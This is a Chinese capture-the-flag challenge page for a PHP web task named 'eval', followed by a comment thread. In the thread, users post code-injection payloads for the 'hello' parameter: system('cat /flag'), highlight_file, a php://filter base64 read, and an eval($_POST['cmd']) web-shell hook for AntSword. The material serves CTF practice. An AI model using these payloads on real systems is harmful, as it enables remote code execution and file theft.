evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18671
提  示:
描  述:
eval
评论
chm 1月前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 2月前

url/?hello=eval(system('cat /flag'))

回复 0

道法自然 2月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 2月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

lins11 3月前

/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码

回复 0

叱咤月海鱼鱼猫 4月前

?hello=highlight_file('flag.php')

回复 1

banfang 4月前

点击场景后将代码发送给豆包等一分钟基本上就可以了

回复 0

pks0 4月前

?hello=1);highlight_file(%27flag.php%27);//

回复 1

一个姓⎝李⎠的师傅~ 6月前

知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d

回复 10
pipipikaqiu 3月前

写的好详细,太好了啊

回复 1

一个姓⎝李⎠的师傅~ 3月前

@想好思路再支付 有帮助就好,感谢老铁的认可!!!

回复 1

想好思路再支付 3月前

思路讲的真好啊李师傅

回复 1

ubudj 6月前

?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

trix2been 攻破了该题 1天前
dyh1213 攻破了该题 1天前
smartada 攻破了该题 2天前
newbird6666 攻破了该题 2天前
WuJL 攻破了该题 3天前
zxd521 攻破了该题 3天前
gbvv3 攻破了该题 4天前
Knyhs 攻破了该题 4天前
穹空丶悠远 攻破了该题 7天前
demonslayer 攻破了该题 7天前
拾柒x 攻破了该题 7天前
CD123456 攻破了该题 7天前
寒夜清风 攻破了该题 8天前
xi24 攻破了该题 9天前
4n4n4n4n 攻破了该题 10天前
bmdz0516 攻破了该题 10天前
18171382569 攻破了该题 11天前
无聊至极的香蕉 攻破了该题 11天前
jiandandian 攻破了该题 11天前
雨季小朋友 攻破了该题 12天前
问题反馈